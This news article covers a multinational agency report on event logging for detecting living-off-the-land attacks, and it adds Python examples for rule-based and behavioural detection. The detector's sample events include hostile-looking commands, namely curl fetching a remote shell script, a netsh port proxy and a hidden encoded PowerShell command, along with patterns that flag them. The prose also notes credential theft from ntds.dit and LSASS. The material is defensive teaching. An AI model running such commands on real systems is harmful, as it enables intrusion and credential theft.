Event Logging Key to Detecting LOTL Attacks, Security Agencies Say
Several U.S. security agencies and their counterparts from more than a half-dozen other countries are urging organizations to bolster their event logging capabilities to better detect cyberthreats as increasing numbers of threat groups are using living-off-the-land (LOTL) techniques in their attacks.
The FBI, CISA, and the National Security Agency (NSA) are among the government bodies that outlined steps public and private entities can take to improve their event-logging capabilities as cybercriminal organizations adopt tactics designed to avoid detection while they run their attacks.
“The increased prevalence of malicious actors employing LOTL techniques, such as LOTL binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging solution,” the agencies wrote in the report “Best Practices for Event Logging and Threat Detection,” released this month. “Advanced Persistent Threats (APTs) are employing LOTL techniques to evade detection. The purpose of this publication is to detail best practice guidance for event logging and threat detection for cloud services, enterprise networks, enterprise mobility, and operational technology (OT) networks.”
Other cyber agencies signing onto the 17-page report include those from Canada, the Netherlands, the UK, South Korea, Singapore, New Zealand, and Japan.
Taking Advantage of What’s Available
Bad actors running LOTL attacks abuse tools that already exist on targeted systems rather than deploying their own malicious code, which lets them slip past security tools and makes the activity harder to detect and mitigate. According to a report issued earlier this year by a similar group of U.S. and international security agencies, such techniques can be used in on-premises, cloud, or hybrid environments and often are leveraged by state-sponsored threat groups from China and Russia.
“LOTL enables threat actors to conduct their operations discreetly as they can camouflage activity with typical system and network behavior, potentially circumventing basic endpoint security capabilities,” they wrote.
In a threat report in May, Honeywell noted the growing use of LOTL strategies in attacks on industrial systems and critical infrastructure facilities by targeting security vulnerabilities in documents and using scripting and command-line techniques.
Volt Typhoon Lives Off the Land
In the recent event logging report, the agencies pointed to the high-profile group Volt Typhoon, noting that since mid-2021 the Chinese state-sponsored threat group has targeted critical infrastructure organizations while relying almost exclusively on LOTL techniques. That has included using PowerShell to discover remote systems, identify user and account names, and enumerate logs to find successful log-ons.
In addition, Volt Typhoon – which CISA said earlier this year had already infiltrated networks of U.S.-based critical infrastructure organizations and was essentially lying in wait to disrupt operations if conflict arose between the United States and China – obtains valid credentials by extracting the Active Directory database file (ntds.dit) and by accessing hashed credentials from the Local Security Authority Subsystem Service (LSASS) process memory, among other tactics.
A Focus on Event Logging
The report is focused on best practices for event logging and threat detection, though the agencies added that LOTL techniques are featured because they make detecting cyberthreats difficult.
“Developing and implementing an enterprise approved logging policy improves an organisation’s chances of detecting malicious behaviour on their systems and enforces a consistent method of logging across an organisation’s environments,” they wrote. “Useful event logs enrich a network defender’s ability to assess security events to identify whether they are false positives or true positives. Implementing high-quality logging will aid network defenders in discovering LOTL techniques that are designed to appear benign in nature.”
On Linux systems, logs can capture the use of curl, systemctl, systemd, Python, and similar LOLBins abused by malicious actors, while on Windows systems they can capture the use of LOLBins such as Netsh and PowerShell. For PowerShell specifically, the report points to command-line logging, script block logging, and module logging, which record the commands and scripts actually executed rather than only the launch of the interpreter. In the cloud, logs should cover all control plane operations, including API calls and end-user logins.
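The paragraph above lists which LOLBins the logs can capture; what a defender still needs is the logic that turns those records into detections. The following is an added example, not code from the report or from any of the agencies, showing rule-based LOTL detection over a handful of constructed, normalized events: PowerShell script block records (event ID 4104), process-creation records (event ID 4688) carrying a base64 -EncodedCommand payload, and Linux auditd-style EXECVE records. The collector schema (field names such as `script_block`, `command_line`, `argv`) and the rule set are assumptions chosen to mirror the PowerShell discovery and log-enumeration behaviour described above; a real SIEM pipeline would normalize records differently.

```python
"""Rule-based LOTL detection over normalised log events (added example, not from the report)."""
import base64
import re


def encode_for_powershell(text):
    """Build the argument PowerShell expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events in a made-up collector schema (assumption: a real pipeline
# would normalise Windows and Linux records into something comparable before analysis).
SAMPLE_EVENTS = [
    # Windows: PowerShell script block logging (event ID 4104)
    {"source": "windows", "event_id": 4104, "host": "ws01", "user": "alice",
     "script_block": "Get-ADComputer -Filter * | Select-Object Name"},
    {"source": "windows", "event_id": 4104, "host": "ws01", "user": "alice",
     "script_block": "Get-Process | Sort-Object CPU -Descending"},   # benign, should not fire
    # Windows: process creation (event ID 4688) with an encoded PowerShell command line
    {"source": "windows", "event_id": 4688, "host": "ws01", "user": "alice",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand "
                     + encode_for_powershell("Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624}")},
    {"source": "windows", "event_id": 4688, "host": "ws01", "user": "bob",
     "command_line": "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5"},
    # Linux: auditd EXECVE-style records
    {"source": "linux", "type": "EXECVE", "host": "web01", "user": "www-data",
     "argv": ["curl", "-s", "http://203.0.113.10/x.sh"]},
    {"source": "linux", "type": "EXECVE", "host": "web01", "user": "root",
     "argv": ["systemctl", "restart", "nginx"]},                      # routine admin, should not fire
]

# Patterns applied to PowerShell text, whether logged as a script block or recovered from
# an encoded command line. They mirror the behaviours described above: discovering remote
# systems, identifying accounts, and enumerating logs for successful logons (4624).
PS_RULES = {
    "ps_remote_system_discovery": re.compile(r"\bGet-ADComputer\b|\bGet-NetComputer\b", re.I),
    "ps_account_enumeration": re.compile(r"\bGet-ADUser\b|\bnet\s+user\b", re.I),
    "ps_logon_log_enumeration": re.compile(r"Get-(WinEvent|EventLog)\b.*\b4624\b", re.I),
}
# Native Windows LOLBins flagged from process-creation command lines.
WIN_LOLBIN_RULES = {
    "netsh_portproxy": re.compile(r"^netsh(\.exe)?\b.*\bportproxy\b", re.I),
}
# Linux LOLBins named in the report; flag the suspicious usage, not every invocation.
LINUX_RULES = {
    "curl_remote_script": lambda argv: argv[0] == "curl"
        and any(a.startswith("http") and a.endswith((".sh", ".py", ".pl")) for a in argv),
    "python_inline_code": lambda argv: argv[0].startswith("python") and "-c" in argv,
}


def _is_encoded_flag(token):
    """Approximates powershell.exe's prefix matching: -e, -ec, -enc, ... -EncodedCommand."""
    t = token.lower()
    return t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t))


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed.
    PowerShell expects base64 of UTF-16LE, so decoding as UTF-8 would garble the script."""
    parts = command_line.split()
    for i, part in enumerate(parts[:-1]):
        if _is_encoded_flag(part):
            try:
                return base64.b64decode(parts[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def _finding(rule, ev, evidence):
    return {"rule": rule, "host": ev["host"], "user": ev["user"], "evidence": evidence}


def detect(events):
    """Run every rule over the events and return the findings in event order."""
    findings = []
    for ev in events:
        if ev["source"] == "windows":
            texts = []
            if ev.get("event_id") == 4104:
                texts.append(ev["script_block"])
            elif ev.get("event_id") == 4688:
                cmd = ev["command_line"]
                for name, rx in WIN_LOLBIN_RULES.items():
                    if rx.search(cmd):
                        findings.append(_finding(name, ev, cmd))
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    texts.append(decoded)      # inspect the payload, not the base64 blob
            for text in texts:
                for name, rx in PS_RULES.items():
                    if rx.search(text):
                        findings.append(_finding(name, ev, text))
        elif ev["source"] == "linux" and ev.get("type") == "EXECVE":
            argv = ev["argv"]
            for name, pred in LINUX_RULES.items():
                if pred(argv):
                    findings.append(_finding(name, ev, " ".join(argv)))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['rule']:28} {f['host']}/{f['user']}: {f['evidence'][:60]}")
```

The point of decoding the `-EncodedCommand` argument before matching is that the 4688 command line alone never contains the strings a rule looks for; without script block logging or this decoding step, the `Get-WinEvent` enumeration would pass as an opaque PowerShell launch. The benign `Get-Process` script block and the root `systemctl restart` are included so the rule set can be checked for false positives as well.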
The agencies stressed the need to create an enterprise-approved event logging policy that takes into account shared responsibilities between the organization and its service providers, including details of which events are to be logged, how the logs will be monitored and retained, and which logging facilities are to be used. Event logging also should be applied widely, including across enterprise networks, operational technology, mobile devices, and the cloud.
“The prioritisation takes into consideration the likelihood that the logged asset will be targeted by a malicious actor, as well as the impact if the asset were to be compromised,” they wrote. “It also prioritises log sources that can assist in identifying LOTL techniques. Please note that this is not an exhaustive list of log sources and their threats, and their priority may differ between organisations.”
Analyzing the Logging Information
Enterprises also need a centralized event logging facility, such as a secured data lake, where logs can be aggregated and processed and from which selected logs can be forwarded to analytic tools such as security information and event management (SIEM) and extended detection and response (XDR) solutions. A centralized storage capability also ensures that logs won’t be lost from commercial network devices, which tend to have limited local storage.
In addition, organizations may need user and entity behavior analytics (UEBA) tools to automate the detection of behavioral anomalies across networks, devices, and accounts, which helps surface bad actors using LOTL techniques whose individual commands look legitimate.
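Behavioral analytics of the kind described above works by learning what each account normally does and scoring new activity against that profile rather than against fixed signatures. The following is an added example, not code from the report or from any UEBA product, of a minimal baseline-and-score loop over constructed process events: a learning window of 14 days builds a per-account profile (executables seen, events per day), and day 15 is scored for LOLBins the account has never run and for volume spikes. The LOLBin watchlist, the spike threshold, and the sample accounts are assumptions for illustration.

```python
"""UEBA-style baseline anomaly detection over process events (added example, not from the report)."""
from collections import defaultdict
from statistics import mean, pstdev

# Assumed watchlist: binaries that are legitimate on their own but worth a second look
# the first time a given account uses them.
LOLBINS = {"powershell.exe", "netsh.exe", "wmic.exe", "certutil.exe", "curl", "systemctl", "python3"}

# Constructed events as (day, account, host, executable). Days 1-14 are the learning
# window, day 15 is the period under evaluation.
BASELINE_EVENTS = [(d, "alice", "ws01", exe) for d in range(1, 15)
                   for exe in ("outlook.exe", "excel.exe", "powershell.exe")]
BASELINE_EVENTS += [(d, "alice", "ws01", "teams.exe") for d in range(2, 15, 2)]  # some day-to-day variance
BASELINE_EVENTS += [(d, "svc_backup", "fs01", "backup.exe") for d in range(1, 15)]
BASELINE_EVENTS += [(d, "dave", "web01", "systemctl") for d in range(1, 15)]

NEW_EVENTS = [
    (15, "alice", "ws01", "outlook.exe"),
    (15, "alice", "ws01", "powershell.exe"),       # alice scripts every day; not novel
    (15, "alice", "ws01", "netsh.exe"),            # first netsh ever for this account
    *[(15, "svc_backup", "fs01", "powershell.exe") for _ in range(8)],  # service account suddenly scripting
    (15, "dave", "web01", "systemctl"),            # routine for dave
    (15, "carol", "ws07", "notepad.exe"),          # account with no history at all
]


def build_baseline(events):
    """Per-account profile: the set of executables seen and the number of events per day."""
    profile = defaultdict(lambda: {"exes": set(), "daily": defaultdict(int)})
    for day, user, _host, exe in events:
        profile[user]["exes"].add(exe)
        profile[user]["daily"][day] += 1
    return profile


def spike_threshold(daily_counts):
    """mean + 3 sigma, floored at twice the mean so a perfectly flat baseline (sigma = 0)
    does not flag a single extra event as a spike."""
    counts = list(daily_counts.values())
    return max(mean(counts) + 3 * pstdev(counts), 2 * mean(counts))


def score(profile, new_events):
    """Return (rule, account, detail) findings for the evaluated period, grouped by account."""
    findings = []
    by_user = defaultdict(list)
    for ev in new_events:
        by_user[ev[1]].append(ev)
    for user in sorted(by_user):
        evs = by_user[user]
        if user not in profile:
            # No history to compare against: surface it rather than silently treating everything as new.
            findings.append(("unseen_account", user, f"{len(evs)} event(s), no baseline"))
            continue
        known = profile[user]["exes"]
        for exe in sorted({exe for _d, _u, _h, exe in evs if exe in LOLBINS and exe not in known}):
            findings.append(("novel_lolbin_for_account", user, exe))
        threshold = spike_threshold(profile[user]["daily"])
        if len(evs) > threshold:
            findings.append(("activity_spike", user, f"{len(evs)} events, threshold {threshold:.1f}"))
    return findings


if __name__ == "__main__":
    for rule, user, detail in score(build_baseline(BASELINE_EVENTS), NEW_EVENTS):
        print(f"{rule:26} {user:12} {detail}")
```

Note what this catches that a signature cannot: `powershell.exe` is not flagged for alice, who runs it daily, but is flagged for the backup service account, for which it is both novel and part of an eightfold jump in activity. Real products add peer-group comparison (is this normal for other service accounts?) and decay older history; the structure is the same.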